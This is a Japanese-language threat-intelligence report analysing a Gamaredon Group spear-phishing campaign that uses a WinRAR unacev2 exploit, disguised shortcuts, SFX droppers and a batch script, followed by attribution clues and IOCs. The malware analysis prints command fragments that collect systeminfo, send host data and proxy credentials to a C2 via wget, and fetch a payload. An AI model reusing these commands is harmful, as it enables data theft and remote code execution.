threat-research

Gamaredon Groupに関するTTPプロファイル分析

FortiGuard Labsによる脅威分析レポート

FortiGuard Labsは先日、ウクライナの法執行機関や政府機関を標的としている可能性がある、Gamaredon Groupによる新たな攻撃活動を発見しました。そこで、この新しい攻撃を分析し、同グループの攻撃方法やこの類の攻撃を始めるにあたって必要になるリソースを理解するために、使用されているツールや戦略を中心に解説することにしました。

Gamaredon Groupは、2013年代半ばからウクライナの政府機関や軍事部門に対するスピアフィッシング攻撃を数多く仕掛けてきた集団として知られています。ウクライナの独立系オンライン出版社であるKharkiv Observerに掲載された記事では、匿名の情報提供者の話として、ウクライナ政府機関もGamaredon Groupが開発したマルウェアに攻撃されたと報じられています。さらに、この記事の取材を受けた匿名のサイバーセキュリティ専門家は、Gamaredon Groupのメンバーとロシア政府が支援するハッカーとの関連性を指摘しています。

このグループの活動はとても活発で、本レポートで分析する攻撃だけでなく、新しいLinuxマルウェアであるEvil Gnomeの拡散にも関与している可能性があります。

Gamaredon Groupは6年以上にわたって活動を続けていますが、攻撃の戦術、テクニック、手順(TTP:Tactics, Techniques, and Procedures)についてはほとんど変化していません。このグループは、主にスピアフィッシングを使用してウクライナの組織やリソースを攻撃しており、軍事文書やそれに類似する文書で標的を誘き寄せます。エサに食いついた被害者を見つけると、自己解凍アーカイブやバッチコマンドファイルを使ってRMS(Remote Manipulation System:遠隔操作システム)バイナリを展開します。


最近の攻撃の分析

我々は手始めに、最新のサンプルの1つを分析することにしました。以下のアーカイブに注目したのは、これがWinRAR unacev2モジュールの脆弱性のエクスプロイトであり、その内容が興味深いものであったためです。これを見ると、誰かがウクライナ国内の軍事紛争を利用して何らかのマルウェアを拡散しているようであり、アーカイブの発信元がGamaredon Groupであることがすぐにわかりました。

図1:アーカイブ内のファイル

図1:アーカイブ内のファイル

アーカイブには、以下のおとりファイルが含まれています。

  • 1_Миротворець\заява.jpg
    • 英訳: Peacemaker\statement.jpg
  • 2_Пiнчук\Пiнчук Андрiй Юрiйович 27.12.1997.docx
    • 英訳: Pinchuk\Pinchuk Andrey Yuriyovych 27.12.1997.doc
    • Andrey Yuriyovychは、ロシアに通じているとされているウクライナの政治家
  • 3_Хавченко\Хавченко Дмитро Василiйович 06.01.1966.docx
    • 英訳:Havchenko \ Havvchenko Dmitry 06.01.1966.doc
    • Dmitry Havchenkoは、ウクライナの政治にも関わりのあるウクライナの起業家で、仮想通貨交換所WEXのオーナー
  • D3i_GMCWAAAq_8u.jpg
  • ssu_zakon.docx
    • 英訳:Security Service of Ukraine_The Law.docx
  • 複数のテキストファイル

いずれのテキストファイルにも、古い電話料金の請求情報に加えて、座標、数字、住所が含まれています。これらの情報の真偽は不明ですが、たとえ本物であったとしても、この種のデータはパブリックドメインで簡単に見つかるものです。

図2:請求データ

図2:請求データ

ssu_zakon.docxと呼ばれる別のファイルを使用して標的を誘き寄せていますが、この文書はウクライナのセキュリティサービス(SSU:Security Service of Ukraine)法に関する単なるメモです。

図3:ssu_zakon.docxの内容

図3:ssu_zakon.docxの内容

このアーカイブには、おとりの画像に書かれている名前に対応する2つのMS Office文書(Pinchuk Andriy Yuryevich 27.12.1997.docxとHavchenko Dmitry Vasilyevich 06.01.1966.docx)も含まれています。

文書名はウクライナ語ですが、内容はロシア語で書かれており、実際にはおとり画像からそのまま翻訳されたテキストだけが含まれています。このテキストは、2人の人物に関する簡単な情報で、登録されている住所と軍での経歴が含まれています。

図4:対応する文書の内容

図4:対応する文書の内容

2つの文書のメタデータをチェックしたところ、以下のことがわかりました。

  • 2_Пiнчук\Пiнчук Андрiй Юрiйович 27.12.1997.docx
    • 作成日時:10.04.2019 07:33:00
    • 更新日時: 10.04.2019 07:34:00
    • 作成者:USER
  • 3_Хавченко\Хавченко Дмитро Василiйович 06.01.1966.docx
    • 作成日時: 10.04.2019 07:35:00
    • 更新日時: 10.04.2019 07:35:00
    • 作成者:USER
  • ssu_zakon.docx
    • 作成日時: 28.01.2019 06:42:00
    • 更新日時: 05.04.2019 05:05:00
    • 作成者:USER

ファイルзаява.jpg(statement.jpg)とD3i_GMCWAAAq_8u.jpgは同じものです。この写真の元のソースは、Mirotvorets(Peacemaker)と呼ばれるWebサイトの投稿であり、このWebサイトは「ウクライナの敵」と判断された人たちの個人情報を公開することで知られています。

下の写真のテキストは、クリミア、軍事紛争、さらにはウクライナの現職大統領(ヴォロディミール・ゼレンスキー氏)の大統領選挙戦を支えたとされている2人の人物に関する記述です。

図5:おとり画像

図5:おとり画像

この画像の日付は2019年4月7日であり、これはMirotvoretsのWebサイトに公開された日付と同じです。ただし、興味深いことにWinRARの最終更新日は21.02.2019 22:03と表示されています。

図6:ファイルの最終更新日時

図6:ファイルの最終更新日時

この時間差の謎を解明するため、ACEのアーカイブ構造をチェックすることにしました。

図7:ACEアーカイブ構造の情報

図7:ACEアーカイブ構造の情報

図7からわかるように、ACEアーカイブにはMS-DOS形式の日付フィールドが含まれています。

02/‎21/‎2019, ‏‎22:03:06をMS-DOSタイムスタンプに変換すると、0x4E55B063になります。これをリトルエンディアンの順序にすると、0x63B0554Eになり、アーカイブをチェックしたところ、対応するフィールドが見つかりました。

図8:タイムスタンプの16進値

図8:タイムスタンプの16進値

ここで、\x63\xB0\x55\x4Eを使って検索すると、Metasploit Frameworkのこのモジュールが見つかります。

図9:Metasploitモジュールの同じ値

図9:Metasploitモジュールの同じ値

さらに検索を続けたところ、2019年2月27日に公開された初期の概念実証スクリプトが見つかりました。

図10:Unacev2.dll脆弱性のPoC(概念実証)

図10:Unacev2.dll脆弱性のPoC(概念実証)

アーカイブにある日付は事前に定義され、ジェネレータースクリプトによって挿入されたものです。この事実から、攻撃者は公開されているスクリプトを利用してペイロードのパッケージを作成したのではないかと推測されます。現段階で確実である唯一本物のタイムスタンプは、MS Office文書のメタデータから抽出されたタイムスタンプである、05.04.2019と10.04.2019です。日付と時刻以外に、ファイル作成者が極めて一般的であるユーザー名:USERであることもわかっています。


エクスプロイトの分析

このエクスプロイトは、3つのファイルをファイルシステムにドロップしますが、いずれも特定のアプリケーションに対応するものです。

最初に、「Goggle Chrome.lnk」というショートカットがユーザーのデスクトップに作成されます。図11でわかるように、ブラウザ名のスペルが間違っています。このショートカットは、ユーザーに「Google Chrome」ブラウザと勘違いしてクリックさせることを目的としています。このショートカットにはアイコンのパスがハードコーディングされているため、ユーザーが自分のコンピュータにブラウザをインストールした場合にのみ、正しい画像が表示されます。

図11:スペルミスがあるショートカット

図11:スペルミスがあるショートカット

次に、%AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Goggle Chrome.lnkのスタートアップフォルダにも、同じショートカットが作成されます。今回のショートカットは永続化を目的とするもので、ユーザーがシステムにログインすると、スタートアップフォルダ内のファイルが実行されます。このように、ユーザーが現在のセッションでデスクトップショートカットをクリックしなかった場合は、スタートアップファイルが攻撃者のバックアップとしての役割を果たし、次のシステムの再起動時またはユーザーログイン時に実行されるようになっています。

そして最後に、「win.exe」という名前の実行可能ファイルがユーザーのディレクトリに作成されます(%userprofile%\win.exe)。


win.exeファイルの分析

ユーザーフォルダにドロップされるファイルは自己解凍RARアーカイブで、パスワードで保護されています。このファイルのコンパイル日時は、24.04.2017 18:45:49(GMT)です。

図12:実行可能ファイルのコンパイルタイムスタンプ

図12:実行可能ファイルのコンパイルタイムスタンプ

自己解凍アーカイブのコンパイル日時がわかれば、攻撃者が使用したWinRARソフトウェアのバージョンがわかります。SFXアーカイブが作成されると、コンパイル日時は、使用されたWinRARソフトウェアの対応するバージョンのタイムスタンプに近い値に設定されます。そのため、そのタイムスタンプに該当する唯一のバージョンは、WinRAR 5.50 Beta 1(x86)であることがわかります。インストーラーファイルのタイムスタンプは24.04.2017 18:46:00(GMT)に設定されており、SFXマルウェアと1秒差です。このバージョンで自己解凍アーカイブを作成しようとしたところ、マルウェアのものと同じ日付になりました。

また、この自己解凍アーカイブには、正規のMicrosoftツールであるSysInternalsのAutorunsの偽のデジタル署名が含まれています。次の図でわかるように、この署名は有効なものではありません。

図13:偽のデジタル署名

図13:偽のデジタル署名

次に、アーカイブパスワードを取得するには、リンクのショートカットを調べる必要があります。

図14:ショートカット内のパスワード

図14:ショートカット内のパスワード

パスワードがわかったため、win.exeファイルの内容を調べることができました。図15からわかるように、これにはwinlog.exeという別の実行可能ファイルが含まれていました。さらに、SFXスクリプトが埋め込まれていて、これはアーカイブデータが解凍された段階で実行されます。

  • Setup=winlog.exe(解凍後に実行)
  • Silent=1(ウィンドウを表示しない)
  • Overwrite=2(上書きしない)

図15:「win.exe」の内容

図15:「win.exe」の内容

次に、このファイルを解凍して内容を分析してみることにしましょう。

このファイルは、Microsoft Office Wordソフトウェアの謎のバージョンに見せかけた7zip SFXアーカイブです。今回のファイルは、以前のSFXアーカイブより古く、最終更新日は10.04.2019 13:55:42 (GMT) に設定されていますが、コンパイルのタイムスタンプは05.03.2016 12:06:17 (GMT) です。残念ながら、7zipソフトウェアのいずれの公開日またはバージョンもこのタイムスタンプに該当しないため、前回と同じ方法でバージョンを特定することはできませんでした。

図16:「winlog.exe」の説明

図16:「winlog.exe」の説明

この自己解凍アーカイブには、2つのファイルと、解凍時に起動されるスクリプトが含まれています。

!@Install@!UTF-8!
RunProgram="hidcon:5493.cmd" (解凍後にコンソールウィンドウを表示せずにバッチファイルを実行)
GUIMode="2"(ウィンドウを表示しない)
SelfDelete="1"(解凍後にアーカイブを削除する)
;!@InstallEnd@!

この自己解凍アーカイブの作成に使用されたソフトウェアのヒントを見つけるため、テキストエディターでファイルを調べてみることにしました。すると、幸いにもバージョンと著作権に関するいくつかの情報が見つかりました。

図17:アーカイブ内の著作権情報

図17:アーカイブ内の著作権情報

今回の著作権、バージョン、スクリプトの検索によって、インストーラー用のModified 7-Zip SFXモジュールと呼ばれるカスタムツールが見つかり、version 1.6.1 Stable build 3873を使用して不正ファイルが作成されたことがわかりました。このツールは、ロシア語のオンラインフォーラムであるOSZoneで無料配布されています。このカスタムソフトウェアを使用すると、分析した不正ファイルとまったく同じタイムスタンプの7zip SFXアーカイブが生成されます。

図18:OSZoneフォーラムに投稿されたカスタムツール

図18:OSZoneフォーラムに投稿されたカスタムツール

次に、アーカイブに含まれるファイルを分析してみましょう。

最初のファイルは、5532.cmdという名前のコマンドプロンプト(バッチ)ファイル、2番目のファイルは、config.exeという名前の実行可能ファイルです。

図19:7zip SFXアーカイブの内容

図19:7zip SFXアーカイブの内容

バッチファイルを調べてみたところ、高度な難読化はされていなかったため簡単に解読できることがわかりました。

最初に確認できるのは構成情報で、以下のC2サーバー、ファイル名、ユーザーエージェントがハードコーディングされています。

  • hxxp://lisingrout.ddns[.]net
  • librelogout.exe
  • "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Firefox/27.0"

構成変数の後に、メインルーチンが見つかりました。このマルウェアは最初に、レジストリキーからプロキシ情報を抽出し(HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings)、以下の情報を保存します。

  • ProxyServer(プロキシサーバーのアドレス)
  • ProxyUser(プロキシユーザー名)
  • ProxyPass(プロキシパスワード)

次に、コンピュータの名前を取得して、一意のIDを生成します。ここまでの処理が完了すると、systeminfoユーティリティを呼び出し、出力全体をテキストファイル(ここでは、ohJlkad.txtという名前)に保存します。

  • systeminfo > ohJlkad.txt

図20:初期段階のデータ収集コード

図20:初期段階のデータ収集コード

その後、以下のコマンドを使用して40秒間待機します。

  • timeout /T 40

タイマーが終了するとpingコマンドを開始し、14個の要求をgoogle.comに送信して、インターネット接続をチェックします。

  • ping -n 14 google.com

処理が終了すると、構成に記述されているファイル名(「librelogout.exe」)でタスクを強制終了し、ファイルを削除します。

最後に、config.exeアプリケーションを呼び出し、いくつかの引数を渡します。

  • --user-agent = [hardcoded UA]
  • --post-data="
    • versiya=wrar
    • comp=%computername%
    • id=[generated from computer name]
    • sysinfo=[data from ohJlkad.txt]"
  • "[C2 Server]"
  • -q -N "[C2 Server]"
  • -O "librelogout.exe"

ユーザーがプロキシ経由でインターネット接続している場合、config.exeにいくつかの追加の引数を渡します。

  • -e
  • --http_proxy=http://[Proxy Server]
  • --proxy-user=[Proxy username]
  • --proxy-password=[Proxy password]

これらの引数の中に、versiya= wrarという興味深いパラメータがありました。このVersiyaという語は、ロシア語ではВерсия、ウクライナ語ではВерсіяで、バージョンを意味します。このVersiyaがwrarと設定されていることから、これはペイロードの配信方法を指すものと推測されます。この例では、初期ファイルであるmirotvorec.rarにはWinRAR unacev2モジュールのエクスプロイトが含まれています。

図21:データ抽出とペイロードドロップのコード

図21:データ抽出とペイロードドロップのコード

config.exeから戻った後に、このスクリプトはC2でホスティングされているメインのペイロードを起動します。このスクリプトルーチンを要約すると、以下のアクションを実行します。

  • 感染ホストに関する情報を収集する
  • その情報をconfig.exe経由でC2に送信する
  • メインのペイロードをダウンロードして起動する

config.exeファイルを分析したところ、OpenSSLをサポートし、Windows用にコンパイルされた正規のwgetバージョン(v 1.11.4)であることがわかりました。コンパイル日時が2009年であることから、かなり古いファイルであることがわかります。おそらく攻撃者は、自ら改造するのを止めてオープンソースのソリューションをそのまま利用し、ホストファイルの解凍とメインのペイロードのダウンロードを実行させることにしたようです。


ショートカットの詳しい分析

攻撃のテクニックを分析するだけでなく、攻撃者に関するできるだけ多くの情報も収集することにしました。幸いにも、この攻撃者が作成したショートカットが手掛かりになりました。

Windowsで使用されるショートカットは、ファイル、アプリケーション、あるいはURLへのすばやいアクセスを可能にする、利便性を目的とする小さいファイルです。それと同時に、.lnkショートカットには、ユーザーから隠されている情報を知ることができることから、攻撃のフォレンジック分析の手掛かりになるという側面もあります。

それでは早速、「Goggle Chrome.lnk」のプロパティを開いて、このショートカットを分析することにしましょう。

図22:ショートカットに含まれる情報

図22:ショートカットに含まれる情報

まずはじめに、このショートカットの[Comments]フィールドにはロシア語のДоступ в Интернетという文字列が含まれていることがわかります。これを翻訳すると「インターネットにアクセス」という意味になり、ショートカットにマウスを近付けると、このテキストが表示されます。実際のGoogle Chromeショートカットにはこのコメントが設定されていますが、表示されるテキストはシステムの言語設定によって異なります。そのため、ロシア語の言語パックを使用しているWindowsがこの不正ショートカットの作成に使用されたものと推測されます。

攻撃者が残したもう1つの情報は、win.exeの解凍に使用したパスワードです。

-pは、解凍時にパスワードを使用する場合のWinRAR SFXの引数であり、したがって、残りの文字列であるfvthbrfycrbte,k.lrbがパスワードということになります。キーボード配列をロシア語に切り替えてパスワード文字を入力すると、最終的にはロシア語の「американскиеу**юдки」になり、これを英語に翻訳すると、「American b**tards(アメリカ人の○○野郎)」という意味になります。これは、Gamaredon Groupが残したイースターエッグなのでしょうか?

次に、ショートカットの内側の分析に進みましょう。.lnk構造の解析ツールを使用すると、ファイルからより多くの情報を抽出できます。我々は、htmlの極めて詳細なレポートを生成できる、LNK Parserというツールを使用することにしました。

図23:LNK Parserによって生成されたレポートの一部

図23:LNK Parserによって生成されたレポートの一部

かなり多くの情報が出力されるため、特に興味深い部分だけを以下に説明します。

  • .lnkファイルの作成日時は、08.04.2019 09:27:06 (UTC) である。
  • このショートカットは、シリアル番号:3c76-6c45のドライブ上に作成された。
  • このショートカットには、別のパス - C:\Users\USER\win.exeがハードコーディングされている。これはおそらくは、おとりのMS Office文書の作成者である、同じUSERである。
  • PCのNetBIOS名:user-pc
  • マシンのMACアドレス:08:00:27:BC:C2:24 (VirtualBox)

これらの情報を使用して、我々はこのショートカットと同じMACアドレス、ドライブのシリアル番号、またはその他の一意のデータが含まれている他のサンプルを検索することにしました。

見つかったサンプルを分析し、帰属の特定に役立つ可能性のある情報を抽出したところ、見つかったそれらのサンプルの多くの動作は、SFXアーカイブ、バッチコマンドファイル、ショートカットといった同じものであることがわかりました。主な相違点は、大半がおとりファイルに関するものだけであり、それ以外では、攻撃者が使用するバッチスクリプトが違うものもいくつかあっただけです。

最初に、詳しく分析したサンプルのmirotvorec.rarに酷似しているサンプルに注目しました。アーカイブの名前は、図4に示したおとりの画像のソースと同じです。我々が見つけた主な違いは3点だけで、おとりファイル(テキストファイルとssu_zakon.docx)がないこと、win.exeとwinlog.exeに使われているアイコンが異なること、そして、最後の相違点は、スクリプトに記述されている以下のユーザーエージェントです。

  • "Mozilla/5.0 (Linux; Android 7.1.1; SM-J510H Build/NMF26X) Mobile Safari/537.36"

この犯罪者は今もこの攻撃で実験を繰り返しているようであり、おとりを変えると同時にドロッパーマルウェアを少しだけ変更することで、さまざまなパターンを試しているようです。

また、vpnclient-win-msi-5.0.07.0410-k9.exeという、政治的な意図のないサンプルも発見しました。このサンプルは、​​WinRAR unacev2.dll脆弱性を使用するものではなく、正規のVPNクライアントツール、そしてバックグラウンドで起動される不正スクリプトが含まれているものでした。サンプルで使用されているショートカットファイルを分析した結果、攻撃者が残した興味深い情報が他にも見つかりました。

このサンプルのハッシュは、5e16a71c7b99cb2780c31af34b268b78525b2b8fed55ff9e7bd4db8b1ba66f90です。

ショートカットから抽出されたデータは、以下のとおりです。

  • 作成日時: 19.03.2019 07:49:13 (UTC)
  • C:\Users\Carson\1.exe
  • Carson (C:\Пользователи)
  • NetBIOS名:user-pc
  • ドライブのシリアル番号:3c76-6c45
  • MACアドレス:08:00:27:BC:C2:24

この情報から、攻撃者のOSアカウントのユーザー名がCarsonであることがわかります。NetBIOS名、ハードドライブのシリアル番号、MACアドレスについては同じままでした。

このサンプルの解凍方法は少しだけ異なり、ショートカットではなく、バッチスクリプトにパスワードが隠されていました。

図24:スクリプトにハードコーディングされたパスワード

図24:スクリプトにハードコーディングされたパスワード

前のサンプルと同様、パスワードは英語キーボード配列で書かれたロシア語の汚い言葉です。

我々が注目したもう1つのサンプルは、6228という.lnkショートカットファイルで、このファイルのハッシュは995e6e0f90c58c82744545bf133b8c4c17decbe851953b0ffe5b21d625cade7dで、以下のデータが見つかりました。

  • 作成日時:01.07.2019 10:36:33 (UTC)
  • 文字列
    • _7-ZIP (F:\VZLOM\SBORKA_SCR)
    • F:\VZLOM\SBORKA_SCR\_7-ZIP\WinRAR.exe
    • 使用された新しいパスワード:"dst,bntct,zd;jgegbyljcrbtcerb"
  • PCのNetBIOS名:шаман-пк
  • ドライブのシリアル番号:3c76-6c45
  • MACアドレス:08:00:27:BC:C2:24

この例では、仮想マシンのPC名がuser-pcからshaman-pc(ロシア語)に変更されていましたが、MACアドレスとドライブのシリアル番号は同じままです。これ以外の興味深い情報として、消し忘れたパスが残っていたことが挙げられます。VZLOMとSBORKA_SCRというロシア語は、それぞれ英語に翻訳すると、HackingとSCR Constructorという意味になり、攻撃者が他の専用ツールを使用して.scrマルウェアを生成していることを意味します。ドライブ文字がFであることから、これらのツールは仮想マシンに接続されたUSBフラッシュドライブ、または共有フォルダに保存されていた可能性があります。

このグループはもう1つ、新しいSFXを解凍するためのパスワード「dst、bntct、zd; jgegbyljcrbtcerb」という痕跡も残しており、これも英語キーボード配列で書かれたロシア語の汚い言葉です。

これ以外にも、類似する別のサンプルが見つかりました。

  1. 0a6aae425a5e36f68b5da69157d2df4e7d836933adfd0696c389097ecb4a0fd7
    • LNKショートカットファイル
    • 作成日時:04/12/2019 10:44:08 UTC
      • 最終更新日時:05/06/2019 11:45:30 UTC
    • 使用された新しいパスワード:gblfhsuyjqyst
  2. 79fd962eb0c256f32786dab4d42cb416f6c1e6766bf0e2dcafdf5ffa2c5e61c1
    • MS Office文書
    • 作成日時:2019:07:22 12:08:00 (GMT)
    • 作成者:mmkrasny
    • 最終更新者:Користувач Windows
    • C2: wifc[.]website
    このサンプルは、VBAマクロを使用してペイロードをドロップします。 C2をチェックしたところ、5.252.193[.]204として解決されるものであることがわかり、IPアドレスが同じ別の不正ドメイン(wifu[.]site)から、追加のサンプルを取得することができました。
  3. bc39db24919b69e80bfb534204f4441a162ca336379bf9eb66b038e039889aac
    • 7zip SFXアーカイブ
    • タイムスタンプ - 31.12.2012 00:38:51 (GMT)
    • 以下の3つのファイルが含まれる
      • 8331.txt
      • 13446.cmd
      • 14638

既に説明したサンプルとは少し異なる、13446.cmdというバッチスクリプトには、以下の追加情報が見つかりました。

  • C2: hxxp://bits-tor[.]host
  • 含まれていた別のパスワード:whevelfrb
  • 永続化のためのタスクのスケジュール

これで、これらのサンプルから抽出された以上の情報を使用し、このグループがこれまでに実行した他の攻撃を探したり、過去の攻撃を特定の攻撃者に結び付けたりできるようになりました。


攻撃者のプロフィール

サンプルに残されていたデータを分析した後に、そのグループを誰が支援しているかを知るために、サンプルに関して収集した情報をまとめてみました。

今回の分析では、これらの攻撃者が2013年半ばから6年以上も活動を続けており、次のような特長があることが明らかになりました。

  • 身代金を要求しない
  • 軍や政府をはじめとする、ウクライナの機密情報を持つ組織の情報だけを標的にする
  • 感染の主な方法はスピアフィッシングであり、時には一般公開されていない文書を巧みに組み合わせて標的を誘き寄せる
  • 一般公開されている正規のツールを使用して、検知を回避すると同時に不正サンプルを作成する

その一方で、マルウェアに残された痕跡からは、いくつかの初歩的なミスを犯していることもわかります。

  • バッチスクリプトが十分に難読化されていないため、簡単に分析できる
  • ショートカットに残されたパスに、ユーザー名、フォルダ、ファイル名が含まれている。国が支援するハッカーにとって、これは致命的なミスである。それは、情報のあらゆる部分から作成者を特定されてしまう恐れがあるためである
  • データの多くはウクライナ語ではなくロシア語で書かれている
  • パスワードには、攻撃者からの個人的なメッセージのように思える、ロシア語の怒りに満ちた言葉が含まれている。このような行為は、プロのサイバー犯罪者ではなく、自分の存在を誇示したい作成者に多く見られる傾向である

まとめ

Gamaredon Groupによる攻撃の分析を通じて、攻撃の準備に使用されたツールを発見し、攻撃者が残した彼ら自身に関する情報が見つかりました。これらの情報によって、さまざまな角度からフォレンジック分析を実行することができました。攻撃で使用されたマルウェアに大量のロシア語が含まれていたことから、このグループにロシアとの強い結び付きがあることに疑いの余地はありません。

Gamaredon Groupに関する分析結果から総合的に判断すると、使用されているツールや方法は、特殊サービスではなく、政治活動との関連性が大きいものと考えられます。残念ながら、それを立証する十分な証拠が残念ながら現段階ではありません。Gamaredon Groupの攻撃の監視を続けることで、いずれ彼らの素顔を知ることができるでしょう。

-= FortiGuard Lion Team =-


MITRE ATT&CKマトリクス

MITRE ATT&CKマトリクス

IOC

5.252.193[.]204 - Malicious
hxxp://lisingrout.ddns[.]net - Malicious
hxxp://bits-tor[.]host - Malicious
hxxp://bits-tor[.]site - Malicious
hxxp://usbqueshions.ddns[.]net - Malicious
hxxp://librework.ddns[.]net - Malicious
hxxp://wifc[.]website - Malicious
hxxp://wifu[.]site - Malicious

04ed2ad4fa67c8abd635d34017c3d04813690a91282a0446c0505b2af97ce48b - W32/PossibleThreat
0a6aae425a5e36f68b5da69157d2df4e7d836933adfd0696c389097ecb4a0fd7 - LNK/Agent.GP!tr
18cd658fac1dd52a75b4eb6558d06dfe5be0e4db7078d72f663c44507449168c - BAT/Pterodo.QW!tr
257f7f67c59ec8f3837c7e4c99b1dc20c5cd0273bd940beef46d5e641393be37 - W32/Pterodo.RN!tr
258ecb059c15178caed309a4861421d9f2436e70fb36fb1bf05e95d8d8d7c7e3 - BAT/Pterodo.SV!tr
3725f82661852d89874a3748302bbf27990d25fc10d28831f1ad35a6c6d3b4bd - LNK/Agent.GP!tr
46638ca3be6cdbd302e84c26bf14bfda6ed0c1353808914b40246c40fdb5b8ed - W32/Generic!tr
5b2c7b05368d825a4f3b10d74074d0803234f918166436d3e48ef7f9faf66461 -W32/Pterodo.RN!tr
5e16a71c7b99cb2780c31af34b268b78525b2b8fed55ff9e7bd4db8b1ba66f90 - W32/Generic!tr
6b5f4aea458fb737e213714b3dda51f31b03ccb53a6a0501ee608c1bfd0cebb7 - BAT/Pterodo.SV!tr
79fd962eb0c256f32786dab4d42cb416f6c1e6766bf0e2dcafdf5ffa2c5e61c1 - VBA/Agent.ATF!tr.dldr
7ba638e8a53e6d1713b8f045c27170ef4a75c88197c57fffe227ca2ab05271e7 - BAT/Agent.GP!tr
842612d1afdf78cb8893018f3aeeec7df9f5f0ab245fe8e6d6b28519d0787937 - BAT/Pterodo.SV!tr
92b474f037796e67cd2f36199a95c9feff46af7e58f4d528567f3f0a857132bf - LNK/Agent.GP!tr
995e6e0f90c58c82744545bf133b8c4c17decbe851953b0ffe5b21d625cade7d - LNK/Agent.GP!tr
a67167f363c2501d6a1436e5f8c12693d7cf9d2f3ca1f71b21c292f041f91c7a - W32/Pterodo.RN!tr
3b50342b6cd96f400fbf7f00098a7dfcc9561037e4aa0bad8cfeafbb6f17923b - Riskware/PasswordProtected
bc39db24919b69e80bfb534204f4441a162ca336379bf9eb66b038e039889aac -W32/Generic.VA!tr
c7bed1150d1b8b3b97454d1e47b6c246fffc471dd03d5a1d094bdf2d807b8e5e - LNK/Agent.GP!tr
d2bbecda830821ed3a00737c67fecb7985d612af58a31a1ee8488ad0409ed23b - LNK/Agent.GP!tr
e1e31702aad4bd7557a05906eb3004e9a72d77aa57e448379bee9a350cbba657 - BAT/Pterodo.SV!tr
ffc438d33f45ea56935f2bb6fca29e71862ecafb8b7e69ea19abd6df2d255075 - BAT/Pterodo.SV!tr


FortiGuard LabsおよびFortiGuardセキュリティサービスのポートフォリオの詳細については、こちらをご覧ください。FortiGuard Labsは、脅威インテリジェンスブリーフ(英語)を毎週お届けしています。ぜひご購読ください。

セキュリティ監査とベストプラクティスを提供するFortiGuardセキュリティレーティングサービスについては、こちらを参照してください。